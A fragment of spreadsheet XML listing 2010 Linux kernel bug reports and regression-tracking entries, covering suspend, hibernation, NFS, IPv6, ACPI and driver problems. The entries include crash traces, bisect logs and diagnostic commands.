    <t>Hi, Today I decided to try the latest revision from Linus' tree (0eddb519b9127c73d53db4bf3ec1d45b13f844d1), to test the latest nouveau patches, but I got stuck while booting the kernel. You can check the acpi call trace at the attached photo. After doing bisect I ended up at patch dadf28a10c3eb29421837a2e413ab869ebd9e168, created to fix the bug #14667. My machine is a MacBook Pro 5,1. After reverting this patch I was able to boot and test the latest kernel available from Linus' tree. Please let me know if you need further information to be able to debug this bug. Best Regards, Ricardo Salveti</t>
  </si>
  <si>
    <t>lid or keyboard no longer trigger suspend</t>
  </si>
  <si>
    <t>2010-04-10 20:54 UTC</t>
  </si>
  <si>
    <t>2010-04-14 12:00 UTC</t>
  </si>
  <si>
    <t>Created attachment 25942 [details] .config for 2.6.34-rc3 With 2.6.33, closing lid or pressing suspend button causes sound feedback and suspend on my thinkpad t500. This is no longer the case starting with 2.6.34-rc1: I do not get either sound or suspend. Verified with 2.6.34-rc1, -rc2 and -rc3. suspend works fine from /sys/power/state or by activating it from gnome applet .config attached.</t>
  </si>
  <si>
    <t>Programs crashing after a couple of days of uptime with hibernation</t>
  </si>
  <si>
    <t>2010-04-10 20:57 UTC</t>
  </si>
  <si>
    <t>With kernel 2.6.30, I can have uptime of more than a month on my desktop PC (with hibernation). It's impossible with 2.6.31. After 1 to 3 days, processes that were running during hibernation (e.g. konsole, kwin, kicker, xorg) start to crash randomly in very weird ways, sometimes leaving messages like this in log: Apr 10 10:38:45 pentium kernel: hald-addon-stor[2290]: segfault at 45890604 ip 45890604 sp bff392ac error ffff0004 Apr 10 10:38:45 pentium kernel: hald[2246]: segfault at 4b334b33 ip 4b334b33 sp bfa94c1c error ffff0004 Apr 10 10:42:01 pentium kernel: crond[1414]: segfault at 1000000 ip 01000000 sp bfcf58dc error ffff0004 in crond[8048000+7000] The kernel itself does not seem to crash. When I run the crashed program again, it seems to work. Looks like some memory corruption. This bug is also present in 2.6.32 and 2.6.33. This is very hard to debug as the test case takes 3 days. I've been trying to bisect it anyway. And after long time, I failed. Got this, which is obviously wrong: 187f81b3d8d315c35c73ac0d05b15a04a0ac3ce7 is first bad commit git bisect log git-bisect start # good: [07a2039b8eb0af4ff464efd3dfd95de5c02648c6] Linux 2.6.30 git-bisect good 07a2039b8eb0af4ff464efd3dfd95de5c02648c6 # bad: [74fca6a42863ffacaf7ba6f1936a9f228950f657] Linux 2.6.31 git-bisect bad 74fca6a42863ffacaf7ba6f1936a9f228950f657 # good: [925d74ae717c9a12d3618eb4b36b9fb632e2cef3] V4L/DVB (11736): videobuf: modify return value of VIDIOC_REQBUFS ioctl git-bisect good 925d74ae717c9a12d3618eb4b36b9fb632e2cef3 # bad: [a380137900fca5c79e6daa9500bdb6ea5649188e] ixgbe: Fix device capabilities of 82599 single speed fiber NICs. git-bisect bad a380137900fca5c79e6daa9500bdb6ea5649188e # good: [1dbb5765acc7a6fe4bc1957c001037cc9d02ae03] Staging: android: lowmemorykiller: fix up remaining checkpatch warnings git-bisect good 1dbb5765acc7a6fe4bc1957c001037cc9d02ae03 # good: [df36b439c5fedefe013d4449cb6a50d15e2f4d70] Merge branch 'for-2.6.31' of git://git.linux-nfs.org/projects/trondmy/nfs-2.6 git-bisect good df36b439c5fedefe013d4449cb6a50d15e2f4d70 # bad: [a800faec1b21d7133b5f0c8c6dac593b7c4e118d] Merge branch 'for-linus' of git://www.jni.nu/cris git-bisect bad a800faec1b21d7133b5f0c8c6dac593b7c4e118d # bad: [ac1b7c378ef26fba6694d5f118fe7fc16fee2fe2] Merge git://git.infradead.org/mtd-2.6 git-bisect bad ac1b7c378ef26fba6694d5f118fe7fc16fee2fe2 # bad: [9e268beb92ee3a853b3946e84b10358207e2085f] Merge branch 'devel' of master.kernel.org:/home/rmk/linux-2.6-arm git-bisect bad 9e268beb92ee3a853b3946e84b10358207e2085f # good: [ab52ae6db035fa425f90146327ab7d2c5d3e5654] nfsd41: Backchannel: minorversion support for the back channel git-bisect good ab52ae6db035fa425f90146327ab7d2c5d3e5654 # bad: [c2860d43f5dfab599fc1308ab61b1d3e30801ceb] [ARM] 5540/1: 32-bit Thumb-2 {ld,st}{m,rd} alignment fault fixup support git-bisect bad c2860d43f5dfab599fc1308ab61b1d3e30801ceb # bad: [187f81b3d8d315c35c73ac0d05b15a04a0ac3ce7] Merge branch 'for-rmk' of git://git.kernel.org/pub/scm/linux/kernel/git/ycmiao/pxa-linux-2.6 into devel git-bisect bad 187f81b3d8d315c35c73ac0d05b15a04a0ac3ce7 # good: [6ea0414fc748ab5b1d83a414c7ee3a60190363aa] [ARM] pxa/hx4700: add Maxim 1587A voltage regulator git-bisect good 6ea0414fc748ab5b1d83a414c7ee3a60190363aa # good: [8776b268c6b0b671c2c744b06fee021b6da3e45f] [ARM] pxa: register wm8731 explicitly for corgi and poodle git-bisect good 8776b268c6b0b671c2c744b06fee021b6da3e45f # good: [cafc22658e85f65df72bee31c31b1fb337e7e606] MAINTAINERS: Update entry with file and SCM for EZX git-bisect good cafc22658e85f65df72bee31c31b1fb337e7e606 # good: [d78ff0a50aac6a1bfe445969dd963e6486e49f56] MAINTAINERS: add entry for Mitac Mio A701 board git-bisect good d78ff0a50aac6a1bfe445969dd963e6486e49f56</t>
  </si>
  <si>
    <t>2.6.33.2 circular locking, hibernate, dm-crypt</t>
  </si>
  <si>
    <t>2.6.33.2</t>
  </si>
  <si>
    <t>2010-04-11 13:23 UTC</t>
  </si>
  <si>
    <t>2011-01-16 22:29 UTC</t>
  </si>
  <si>
    <t>Subject : 2.6.33.2 circular locking, hibernate, dm-crypt Submitter : Richard Zidlicky &lt;rz@linux-m68k.org&gt; Date : 2010-04-08 11:06 Message-ID : 20100408110607.GB1788@linux-m68k.org References : http://marc.info/?l=linux-kernel&amp;m=127073165206744&amp;w=2 This entry is being used for tracking a regression from 2.6.32. Please don't close it until the problem is fixed in the mainline.</t>
  </si>
  <si>
    <t>Warning in ath9k after update from 2.6.33.1 to 2.6.33.2</t>
  </si>
  <si>
    <t>2010-04-11 14:05 UTC</t>
  </si>
  <si>
    <t>2010-12-08 08:44 UTC</t>
  </si>
  <si>
    <t>Subject : Warning in ath9k after update from 2.6.33.1 to 2.6.33.2 Submitter : Thomas Bächler &lt;thomas@archlinux.org&gt; Date : 2010-04-09 17:21 Message-ID : 4BBF6206.2070103@archlinux.org References : http://marc.info/?l=linux-kernel&amp;m=127083430918613&amp;w=2 This entry is being used for tracking a regression from 2.6.32. Please don't close it until the problem is fixed in the mainline.</t>
  </si>
  <si>
    <t>Incorrectly calculated free blocks result in ENOSPC from writepage</t>
  </si>
  <si>
    <t>from 2.6.11 to 2.6.33-rc4</t>
  </si>
  <si>
    <t>2010-04-12 11:24 UTC</t>
  </si>
  <si>
    <t>Dmitry Monakhov</t>
  </si>
  <si>
    <t>2010-06-13 11:44 UTC</t>
  </si>
  <si>
    <t>Created attachment 25965 [details] testcase No mount per-sb counters (freeblocks/freeinodes/dir and etc) are initialized before journal was replayed. But in fact if journal wasn't empty statistics will be probably changed after journal replay. This result in per-sb counter inconsistency which result in incorrect delalloc reservation. See testcase. This is long standing bug at least from 2.6.12 where the linus's tree starts i (was too lazy to dig in to old-git tree). But it case of ext3 this result only in incorrect numbers from statfs() The fix is simple, we just have to move counter initialisation after journal_reply. I've open this bug only as testcase storage.</t>
  </si>
  <si>
    <t>2.6.34 RC3 and RC4: BUG: unable to handle kernel NULL pointer dereference at 0000001c at apbt_cpuhp_notify+0x52/0x130</t>
  </si>
  <si>
    <t>2010-04-15 07:34 UTC</t>
  </si>
  <si>
    <t>Andreas Jaeger</t>
  </si>
  <si>
    <t>2010-05-04 21:23 UTC</t>
  </si>
  <si>
    <t>Created attachment 26007 [details] dmesg output showing oops Running halt gives a kernel OOPS. It can be triggered reliably as well with: # echo 0 &gt; /sys/devices/system/cpu/cpu1/online This happens with both the 2.6.34 RC3 and RC4 (2.6.33 worked fine) kernels from openSUSE. Rafael Wysocki suggested (see http://bugzilla.novell.com/show_bug.cgi?id=595904) to report it here. The OOPS is at arch/x86/kernel/apb_timer.c:415. I'm attaching my full dmesg output until I run the echo command. Hardware is an Intel Atom based HP Mini 5101 netbook.</t>
  </si>
  <si>
    <t>external usb sound card doesn't work after resume</t>
  </si>
  <si>
    <t>2.6.34-rc2 (or maybe already 2.6.34-rc1)</t>
  </si>
  <si>
    <t>2010-04-15 10:16 UTC</t>
  </si>
  <si>
    <t>2010-06-13 12:14 UTC</t>
  </si>
  <si>
    <t>My external usb sound card doesn't work after resume. What is strange is that it appears in lsusb output but not in aplay -l. I am using tuxonice but the problem also occurs with the suspend-to-disk functionality of the mainline kernel.</t>
  </si>
  <si>
    <t>Bind mounts broken when used with NFSv4</t>
  </si>
  <si>
    <t>2.6.32.9-70</t>
  </si>
  <si>
    <t>2010-04-15 14:33 UTC</t>
  </si>
  <si>
    <t>2012-05-14 17:23 UTC</t>
  </si>
  <si>
    <t>There is some serious weirdness if you try and use bind mounts in conjunction with nfs4 mounts. $ df -T /var/tmp Filesystem Type 1K-blocks Used Available Use% Mounted on fs.beware.dropbear.id.au:/tmp/ nfs4 5160576 403968 4494464 9% /var/tmp $ df -T /tmp Filesystem Type 1K-blocks Used Available Use% Mounted on /tmp tmpfs 921600 4 921596 1% /tmp $ cat /tmp/foo Over The Lazy Dogs Back $ cat /var/tmp/foo The Quick Brown Fox # # So /var/tmp/foo is on an nfs4 mounted filesystem # /tmp/foo is on a tmpfs. Both files are different. # $ mount --bind /tmp/foo /var/tmp/foo $ cat /tmp/foo Over The Lazy Dogs Back $ cat /var/tmp/foo The Quick Brown Fox # # Both files should be the same. ie "Over The Lazy Dogs Back" # # In other oddity, ls -l correctly shows both files the same size (31), # and ls -i correctly shows both have the same inode number, yet: $ cat /tmp/foo | wc -c 31 $ cat /var/tmp/foo | wc -c 20 # # So much for reading. Now what about writing? # $ echo blah blah &gt; /var/tmp/foo $ cat /var/tmp/foo blah blah Brown Fox # # This should have been truncated # $ cat /tmp/foo # # /tmp/foo has been truncated, but it should have "blah blah" in it # $ umount /var/tmp/foo $ cat /var/tmp/foo blah blah Brown Fox $cat /tmp/foo # Empty</t>
  </si>
  <si>
    <t>[REGRESSION bisected] Sound goes too fast due to commit 7b3a177b0</t>
  </si>
  <si>
    <t>2010-04-16 14:53 UTC</t>
  </si>
  <si>
    <t>2010-07-01 18:02 UTC</t>
  </si>
  <si>
    <t>Subject : [REGRESSION bisected] Sound goes too fast due to commit 7b3a177b0 Submitter : Éric Piel &lt;Eric.Piel@tremplin-utc.net&gt; Date : 2010-04-13 21:54 Message-ID : 4BC4E812.6050602@tremplin-utc.net References : http://marc.info/?l=linux-kernel&amp;m=127119569009790&amp;w=2 Handled-By : Takashi Iwai &lt;tiwai@suse.de&gt; This entry is being used for tracking a regression from 2.6.33. Please don't close it until the problem is fixed in the mainline. Caused by: commit 7b3a177b0d4f92b3431b8dca777313a07533a710 Author: Jaroslav Kysela &lt;perex@perex.cz&gt; Date: Fri, 8 Jan 2010 07:43:01 +0000 ALSA: pcm_lib: fix "something must be really wrong" condition Signed-off-by: Jaroslav Kysela &lt;perex@perex.cz&gt; First-Bad-Commit : 7b3a177b0d4f92b3431b8dca777313a07533a710</t>
  </si>
  <si>
    <t>kmemleak (acpi) after suspend2ram and wakeup</t>
  </si>
  <si>
    <t>v2.6.34-rc7-154-g18e41da</t>
  </si>
  <si>
    <t>2010-04-18 15:30 UTC</t>
  </si>
  <si>
    <t>2010-11-02 02:39 UTC</t>
  </si>
  <si>
    <t>If I suspend2ram my ThinkPad T400 (sync; echo mem &gt; /sys/power/state) and wake it up I get this kmemleak : unreferenced object 0xf5dee180 (size 192): comm "bash", pid 8961, jiffies 8253287 (age 3162.370s) hex dump (first 32 bytes): 61 09 00 00 00 00 00 00 b8 88 00 00 00 00 00 00 a............... 0a 00 00 00 00 00 00 00 0a 00 00 00 00 00 00 00 ................ backtrace: [&lt;c122caed&gt;] kmemleak_alloc+0x3d/0x60 [&lt;c109c852&gt;] __kmalloc+0xf2/0x120 [&lt;f80968ec&gt;] acpi_processor_register_performance+0x264/0x3d5 [processor] [&lt;f993d779&gt;] acpi_cpufreq_cpu_init+0xb9/0x5a0 [acpi_cpufreq] [&lt;c11c07cc&gt;] cpufreq_add_dev+0x1ac/0x710 [&lt;c1239415&gt;] cpufreq_cpu_callback+0x45/0x67 [&lt;c104d10d&gt;] notifier_call_chain+0x2d/0x60 [&lt;c104d24a&gt;] raw_notifier_call_chain+0x1a/0x20 [&lt;c123822c&gt;] _cpu_up+0x107/0x10d [&lt;c122bf83&gt;] enable_nonboot_cpus+0x83/0xb0 [&lt;c1060fa0&gt;] suspend_devices_and_enter+0xf0/0x1a0 [&lt;c1061122&gt;] enter_state+0xd2/0xf0 [&lt;c1060910&gt;] state_store+0x80/0xc0 [&lt;c1122e34&gt;] kobj_attr_store+0x24/0x30 [&lt;c10e771d&gt;] sysfs_write_file+0x9d/0x100 [&lt;c10a2b7c&gt;] vfs_write+0x9c/0x180</t>
  </si>
  <si>
    <t>utsname.domainname not set in x86_32 processes (causing "YPBINDPROC_DOMAIN: domain not bound" errors)</t>
  </si>
  <si>
    <t>2.6.34-rc4</t>
  </si>
  <si>
    <t>2010-04-19 21:28 UTC</t>
  </si>
  <si>
    <t>adi</t>
  </si>
  <si>
    <t>2010-05-04 19:39 UTC</t>
  </si>
  <si>
    <t>2.6.34-rc4 uname(2) from a x86_32 process copies out 325 bytes rather than the 390 bytes that 2.6.31 copied out (and that userland expects): 2.6.31.12% cat foo.c main() { char buf[1000]; memset(buf, 'x', sizeof(buf)); uname(buf); write(1, buf, sizeof(buf)); return 0; } 2.6.31.12% i686-linux-gcc foo.c 2.6.31.12% ./a.out | hd 00000000 4c 69 6e 75 78 00 00 00 00 00 00 00 00 00 00 00 |Linux...........| 00000010 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 |................| * 00000040 00 63 76 70 65 34 33 30 30 00 00 00 00 00 00 00 |.cvpe4300.......| 00000050 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 |................| * 00000080 00 00 32 2e 36 2e 33 31 2e 31 32 2d 63 76 70 32 |..2.6.31.12-cvp2| 00000090 30 31 30 30 33 32 39 2d 30 30 31 34 38 2d 67 39 |0100329-00148-g9| 000000a0 61 38 62 36 36 61 00 00 00 00 00 00 00 00 00 00 |a8b66a..........| 000000b0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 |................| 000000c0 00 00 00 23 36 20 53 4d 50 20 54 75 65 20 41 70 |...#6 SMP Tue Ap| 000000d0 72 20 36 20 31 36 3a 30 33 3a 33 31 20 50 44 54 |r 6 16:03:31 PDT| 000000e0 20 32 30 31 30 00 00 00 00 00 00 00 00 00 00 00 | 2010...........| 000000f0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 |................| 00000100 00 00 00 00 78 38 36 5f 36 34 00 00 00 00 00 00 |....x86_64......| 00000110 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 |................| * 00000140 00 00 00 00 00 28 6e 6f 6e 65 29 00 00 00 00 00 |.....(none).....| 00000150 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 |................| * 00000180 00 00 00 00 00 00 78 78 78 78 78 78 78 78 78 78 |......xxxxxxxxxx| 00000190 78 78 78 78 78 78 78 78 78 78 78 78 78 78 78 78 |xxxxxxxxxxxxxxxx| * 000003e0 78 78 78 78 78 78 78 78 |xxxxxxxx| 000003e8 2.6.34-rc4% ./a.out | hd 00000000 4c 69 6e 75 78 00 00 00 00 00 00 00 00 00 00 00 |Linux...........| 00000010 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 |................| * 00000040 00 63 76 70 2d 6c 6f 61 6e 65 72 2d 31 36 00 00 |.cvp-loaner-16..| 00000050 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 |................| * 00000080 00 00 32 2e 36 2e 33 34 2d 72 63 34 2d 30 30 31 |..2.6.34-rc4-001| 00000090 31 35 2d 67 64 63 35 37 64 61 33 00 00 00 00 00 |15-gdc57da3.....| 000000a0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 |................| * 000000c0 00 00 00 23 36 20 53 4d 50 20 46 72 69 20 41 70 |...#6 SMP Fri Ap| 000000d0 72 20 31 36 20 31 30 3a 34 31 3a 34 33 20 50 44 |r 16 10:41:43 PD| 000000e0 54 20 32 30 31 30 00 00 00 00 00 00 00 00 00 00 |T 2010..........| 000000f0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 |................| 00000100 00 00 00 00 78 38 36 5f 36 34 00 00 00 00 00 00 |....x86_64......| 00000110 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 |................| * 00000140 00 00 00 00 00 78 78 78 78 78 78 78 78 78 78 78 |.....xxxxxxxxxxx| 00000150 78 78 78 78 78 78 78 78 78 78 78 78 78 78 78 78 |xxxxxxxxxxxxxxxx| * 000003e0 78 78 78 78 78 78 78 78 |xxxxxxxx| 000003e8 This results in 32-bit applications that attempt to use libnss_nis's getpwuid() to fail with "YPBINDPROC_DOMAIN: Domain not bound", because they use an uninitialized value for domainname.</t>
  </si>
  <si>
    <t>kernel BUG at kernel/power/snapshot.c:522</t>
  </si>
  <si>
    <t>2010-04-20 19:02 UTC</t>
  </si>
  <si>
    <t>2011-07-07 20:56 UTC</t>
  </si>
  <si>
    <t>Subject : kernel BUG at kernel/power/snapshot.c:522 Submitter : Joerg Platte &lt;jplatte@naasa.net&gt; Date : 2010-04-17 14:01 Message-ID : 201004171601.05025.jplatte@naasa.net References : http://marc.info/?l=linux-kernel&amp;m=127151346415534&amp;w=2 This entry is being used for tracking a regression from 2.6.32. Please don't close it until the problem is fixed in the mainline.</t>
  </si>
  <si>
    <t>Linux should accept Memory24, Memory32, Memory32Fixed PCI host bridge windows</t>
  </si>
  <si>
    <t>2010-04-20 19:06 UTC</t>
  </si>
  <si>
    <t>2010-09-29 01:59 UTC</t>
  </si>
  <si>
    <t>Code in arch/x86/pci/acpi.c parses PCI host bridge _CRS descriptors to learn the windows forwarded to the PCI bus. We currently only look at 16-, 32-, and 64-bit Address Space Descriptors. By experimenting with Windows Server 2008 R2 in a qemu environment, I learned that Windows also accepts Memory24, Memory32, and Memory32Fixed descriptors. Linux should be changed to accept them also. These experiments are based on SeaBIOS (http://www.coreboot.org/SeaBIOS) as of commit c35e1e50c3. The attached DSDT patches and Windows screenshots show the results.</t>
  </si>
  <si>
    <t>2.6.34rc4 NFS writeback regression (bisected): client often fails to delete things it just created</t>
  </si>
  <si>
    <t>2010-04-20 19:22 UTC</t>
  </si>
  <si>
    <t>2010-05-04 21:19 UTC</t>
  </si>
  <si>
    <t>Subject : 2.6.34rc4 NFS writeback regression (bisected): client often fails to delete things it just created Submitter : Nix &lt;nix@esperi.org.uk&gt; Date : 2010-04-17 19:43 Message-ID : 87tyr9dfvv.fsf@spindle.srvr.nix References : http://marc.info/?l=linux-kernel&amp;m=127153342205389&amp;w=2 This entry is being used for tracking a regression from 2.6.33. Please don't close it until the problem is fixed in the mainline. Caused by: commit acdc53b2146c7ee67feb1f02f7bc3020126514b8 Author: Trond Myklebust &lt;Trond.Myklebust@netapp.com&gt; Date: Fri Feb 19 17:03:26 2010 -0800 NFS: Replace __nfs_write_mapping with sync_inode() Signed-off-by: Trond Myklebust &lt;Trond.Myklebust@netapp.com&gt; First-Bad-Commit : acdc53b2146c7ee67feb1f02f7bc3020126514b8</t>
  </si>
  <si>
    <t>[Sony Corporation VGN-NS130FE] suspend/resume failure</t>
  </si>
  <si>
    <t>2.6.34-rc7</t>
  </si>
  <si>
    <t>2010-04-22 20:48 UTC</t>
  </si>
  <si>
    <t>2013-03-16 16:54 UTC</t>
  </si>
  <si>
    <t>Open bug in Launchpad.net: https://bugs.launchpad.net/bugs/568655</t>
  </si>
  <si>
    <t>Another BUG_ON() in blkio controller</t>
  </si>
  <si>
    <t>2010-04-23 13:32 UTC</t>
  </si>
  <si>
    <t>2010-10-28 17:59 UTC</t>
  </si>
  <si>
    <t>Subject : Another BUG_ON() in blkio controller Submitter : Vivek Goyal &lt;vgoyal@redhat.com&gt; Date : 2010-04-21 20:12 Message-ID : 20100421201201.GF3275@redhat.com References : http://marc.info/?l=linux-kernel&amp;m=127188075902204&amp;w=2 This entry is being used for tracking a regression from 2.6.33. Please don't close it until the problem is fixed in the mainline.</t>
  </si>
  <si>
    <t>crash in inet6_csk_bind_conflict</t>
  </si>
  <si>
    <t>v2.6.34-rc5-204-gddc9b34</t>
  </si>
  <si>
    <t>2010-04-25 14:29 UTC</t>
  </si>
  <si>
    <t>2010-04-27 22:12 UTC</t>
  </si>
  <si>
    <t>with rhel6 beta userspace, v2.6.34-rc5-204-gddc9b34 kernel, my system crashes during boot the crash seems to be around net/ipv6/inet6_connection_sock.c:50 kernel v2.6.34-rc5 boots fine. after reverting fda48a0d7a8412cedacda46a9c0bf8ef9cd13559, the crash goes away. BUG: unable to handle kernel NULL pointer dereference at 0000000000000004 IP: [&lt;ffffffffa02b99aa&gt;] inet6_csk_bind_conflict+0x6a/0x110 [ipv6] PGD 0 [ OK ] Oops: 0000 [#1] SMP last sysfs file: /sys/devices/pci0000:00/0000:00:01.0/0000:01:00.0/net/eth0/ifindex CPU 9 Modules linked in: ip6t_REJECT nf_conntrack_ipv6 ip6table_filter ip6_tables ipv6 dm_mirror dm_region_hash dm_log igb i2c_i801 sg iTCO_wdt iTCO_vendor_support shpchp ioatdma dca pcspkr sr_mod cdrom ext4 mbcache jbd2 sd_mod ata_generic crc_t10dif pata_acpi ahci pata_jmicron radeon ttm drm_kms_helper drm i2c_algo_bit i2c_core dm_mod [last unloaded: scsi_wait_scan] Pid: 1640, comm: master Not tainted 2.6.34-rc5-mst #1 X8DTN/X8DTN RIP: 0010:[&lt;ffffffffa02b99aa&gt;] [&lt;ffffffffa02b99aa&gt;] inet6_csk_bind_conflict+0x6a/0x110 [ipv6] RSP: 0018:ffff8803357a7d98 EFLAGS: 00010293 RAX: 0000000000000000 RBX: ffff880335709440 RCX: 0000000000000000 RDX: 0000000000020011 RSI: ffff880335709440 RDI: ffff880334c61e78 RBP: ffff8803357a7db8 R08: 0000000000000019 R09: 0000000000000019 R10: 00000000000000d4 R11: 0000000000000400 R12: ffff880335709468 R13: ffff880334c61800 R14: ffff880335489500 R15: ffffffff8225d700 FS: 00007feacd26f7c0(0000) GS:ffff8801c5700000(0000) knlGS:0000000000000000 CS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033 CR2: 0000000000000004 CR3: 00000003341ef000 CR4: 00000000000006e0 DR0: 0000000000000000 DR1: 0000000000000000 DR2: 0000000000000000 DR3: 0000000000000000 DR6: 00000000ffff0ff0 DR7: 0000000000000400 Process master (pid: 1640, threadinfo ffff8803357a6000, task ffff880334225540) Stack: 0000000000000000 ffffffff8225b500 ffffc9001251ced0 ffff880334c61800 &lt;0&gt; ffff8803357a7e48 ffffffff81418fa8 ffff880300000019 ffffffff8149ceb6 &lt;0&gt; 0000000536306140 0000000000000246 ffff8803357a7e08 0000000000000246 Call Trace: [&lt;ffffffff81418fa8&gt;] inet_csk_get_port+0x238/0x450 [&lt;ffffffff8149ceb6&gt;] ? _raw_spin_lock_bh+0x16/0x40 [&lt;ffffffff8149ce15&gt;] ? _raw_read_unlock_bh+0x15/0x20 [&lt;ffffffffa0290226&gt;] ? ipv6_chk_addr+0xe6/0x100 [ipv6]</t>
  </si>
  <si>
    <t>acpi_processor_get_throttling_info taking excessive time</t>
  </si>
  <si>
    <t>2.6.32.11</t>
  </si>
  <si>
    <t>2010-04-26 18:09 UTC</t>
  </si>
  <si>
    <t>2010-09-29 02:23 UTC</t>
  </si>
  <si>
    <t>On our test machine that has 1664 processors, we've discovered that &gt; the function acpi_processor_get_throttling_info takes 10 minutes. &gt; It's estimated that with 4096 cpus, this will take over 25 minutes. &gt; &gt; It seems that the acpi_processor_get_throttling_info serially queries &gt; each cpu with a "runon" function to extract the throttling states. &gt; &gt; My question is can this be optimized to use the previous processor's &gt; throttling states? Would there be any reason to expect any of the &gt; processors to be different? &gt; &gt; Another thought, if each processor needs to be queried, can the &gt; functions be run in parallel? &gt;</t>
  </si>
  <si>
    <t>2.6.34-rc5+: oops in IPv6</t>
  </si>
  <si>
    <t>2.6.34-rc5</t>
  </si>
  <si>
    <t>2010-04-26 18:57 UTC</t>
  </si>
  <si>
    <t>2010-05-04 20:45 UTC</t>
  </si>
  <si>
    <t>Subject : 2.6.34-rc5+: oops in IPv6 Submitter : Manuel Lauss &lt;manuel.lauss@googlemail.com&gt; Date : 2010-04-25 14:45 Message-ID : z2if861ec6f1004250745u94892bdbw9b17db4be57b131b@mail.gmail.com References : http://marc.info/?l=linux-kernel&amp;m=127220675332101&amp;w=2 This entry is being used for tracking a regression from 2.6.33. Please don't close it until the problem is fixed in the mainline.</t>
  </si>
  <si>
    <t>2.6.34-rc5-git7 (plus all patches) -- another suspicious rcu_dereference_check() usage.</t>
  </si>
  <si>
    <t>2010-04-27 19:41 UTC</t>
  </si>
  <si>
    <t>2010-06-23 00:13 UTC</t>
  </si>
  <si>
    <t>Subject : 2.6.34-rc5-git7 (plus all patches) -- another suspicious rcu_dereference_check() usage. Submitter : Miles Lane &lt;miles.lane@gmail.com&gt; Date : 2010-04-27 0:51 Message-ID : h2ya44ae5cd1004261751waa5cb65ei3d139cbcfa2cc5cf@mail.gmail.com References : http://marc.info/?l=linux-kernel&amp;m=127232949104878&amp;w=2 This entry is being used for tracking a regression from 2.6.33. Please don't close it until the problem is fixed in the mainline.</t>
  </si>
  <si>
    <t>acpi_idle: Very idle Core i7 machine never enters C6</t>
  </si>
  <si>
    <t>2010-04-30 18:30 UTC</t>
  </si>
  <si>
    <t>Philip Langdale</t>
  </si>
  <si>
    <t>2010-07-26 23:55 UTC</t>
  </si>
  <si>
    <t>Created attachment 26188 [details] ACPI dump from GA-P55M-UD4 As discussed on the mailing list. Jeff and I both have systems where an idle Core i7 spends almost no time in C6 (C3 as reported by powertop). In my case, it's a gigabyte GA-P55M-UD4 and Jeff's is some Dell motherboard. Matthew Garrett pointed out the following, seemingly ignored, patch as a logical solution to the problem and it does indeed appear to work. http://lkml.org/lkml/2009/11/10/23 (Patchwork seems to have mangled the patch in question so I didn't link to it)</t>
  </si>
  <si>
    <t>Intel WiFi Link 5150ABG - connection broken or freezing when transferring large files</t>
  </si>
  <si>
    <t>2010-05-01 13:00 UTC</t>
  </si>
  <si>
    <t>RussianNeuroMancer</t>
  </si>
  <si>
    <t>2010-06-14 22:16 UTC</t>
  </si>
  <si>
    <t>When I transfer large files (few Gb for example) wifi connection can be broken or freezing. If this happened - I can't connect to AP until reboot the system. What additional information would need to provide?</t>
  </si>
  <si>
    <t>Powernow-k8 detects wrong p-states for AMD Thuban 6-core processor (1090T)</t>
  </si>
  <si>
    <t>2.6.33.3</t>
  </si>
  <si>
    <t>2010-05-02 17:38 UTC</t>
  </si>
  <si>
    <t>Larkin Lowrey</t>
  </si>
  <si>
    <t>2011-07-30 06:28 UTC</t>
  </si>
  <si>
    <t>Output during boot: powernow-k8: Found 1 AMD Phenom(tm) II X6 1090T Processor processors (6 cpu cores) (version 2.20.00) powernow-k8: 0 : pstate 0 (3600 MHz) powernow-k8: 1 : pstate 1 (3200 MHz) powernow-k8: 2 : pstate 2 (2400 MHz) powernow-k8: 3 : pstate 3 (1600 MHz) My understanding of AMD's Turbo Core is that the 3.6GHz p-state 0 is supposed to be a hidden hardware p-state and that the OS kernel should see hw p-state 1 (3.2GHz) as it's p-state 0. My expectation is to see: p-state 0: 3200 MHz p-state 1: 2400 MHz p-state 2: 1600 MHz p-state 3: 800 MHz Note: the lowest clock 800MHz is missing from the list output by powernow-k8. I am running this on a Gigabyte GA-890GPA-UD3H v1 board with the latest non-beta bios F6. The bios does support, and recognize, the 1090T processor. I do have the Turbo Core option enabled in the bios. While cpufreq does identify the hw p-state 3600MHz, it does not use it. I have run mprime with 1 thread and with 6 and there is never any time recorded for 3600MHz. When under full load, cores run at 3200MHz, which is expected.</t>
  </si>
  <si>
    <t>PNP resource assignment fails</t>
  </si>
  <si>
    <t>2.6.34-rc6</t>
  </si>
  <si>
    <t>2010-05-03 15:23 UTC</t>
  </si>
  <si>
    <t>2010-05-20 03:05 UTC</t>
  </si>
  <si>
    <t>Pavel wrote: &gt; i am playing with old PIII computer (HP Vectra VE) and ISA soundcards. &gt; Soundcards are PNP(yamaha,opti,ess,...) and no PNP (multisound). &gt; Machine &gt; is old, but ACPI compliant - old BIOS. &gt; &gt; Computer booting OK. PNP0 devices allocate resources OK, but PNP1 &gt; devices (one ISA slot) not. PNP soundcard driver is not correctly &gt; loaded &gt; - soundcard device not created. &gt; 2.6.33 kernel working without problem.</t>
  </si>
  <si>
    <t>Not able to use nozomi modem</t>
  </si>
  <si>
    <t>2010-05-05 12:32 UTC</t>
  </si>
  <si>
    <t>Marek</t>
  </si>
  <si>
    <t>2012-05-13 14:35 UTC</t>
  </si>
  <si>
